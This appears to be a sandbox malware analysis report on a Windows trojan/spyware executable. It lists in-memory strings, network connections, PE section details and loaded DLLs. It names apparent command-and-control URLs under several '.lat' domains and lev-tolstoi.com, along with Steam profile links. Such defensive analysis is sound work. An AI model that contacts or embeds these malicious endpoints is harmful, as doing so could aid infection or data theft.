Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: jSFUzuYPG9.exe, 00000000.00000002.1978820464.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://energyaffai.lat/
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://energyaffai.lat:443/api=
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat:443/api$
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449631848.0000000005DE9000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/$
Source: jSFUzuYPG9.exe, 00000000.00000003.1499562858.00000000016AD000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496634027.00000000016AD000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/(
Source: jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/;#
Source: jSFUzuYPG9.exe, 00000000.00000003.1503367949.00000000016AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/X236
Source: jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1427112957.0000000005DF2000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: jSFUzuYPG9.exe, 00000000.00000003.1503367949.00000000016AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api8
Source: jSFUzuYPG9.exe, 00000000.00000003.1496559642.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/cE
Source: jSFUzuYPG9.exe, 00000000.00000003.1474837277.0000000005DEB000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474953402.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496559642.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/h
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/pi
Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/x
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/api
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.s7
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacebudi.lat:443/api
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.nP
Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Per
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1326699154.000000000164A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sustainskelet.lat/
Source: jSFUzuYPG9.exe, 00000000.00000003.1326699154.000000000164A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sustainskelet.lat/api
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sustainskelet.lat/d
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sustainskelet.lat:443/apis
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sweepyribs.lat:443/api
Source: jSFUzuYPG9.exe, 00000000.00000002.1978820464.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.11:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.11:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.152.124:443 -> 192.168.2.11:49777 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: jSFUzuYPG9.exe	Static PE information: section name:
Source: jSFUzuYPG9.exe	Static PE information: section name: .rsrc
Source: jSFUzuYPG9.exe	Static PE information: section name: .idata

Detected potential crypto function

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Code function: 0_3_016AF430

0_3_016AF430

One or more processes crash

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2140

Uses 32bit PE files

Source: jSFUzuYPG9.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: jSFUzuYPG9.exe

Static PE information: Section: ZLIB complexity 0.9974114404965754

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@13/4

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7428

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\f51efc0a-74d9-4ec7-9c39-26d8e1893b37

Jump to behavior

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: jSFUzuYPG9.exe	ReversingLabs: Detection: 63%
Source: jSFUzuYPG9.exe	Virustotal: Detection: 50%

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

File read: C:\Users\user\Desktop\jSFUzuYPG9.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\jSFUzuYPG9.exe "C:\Users\user\Desktop\jSFUzuYPG9.exe"
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2140

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
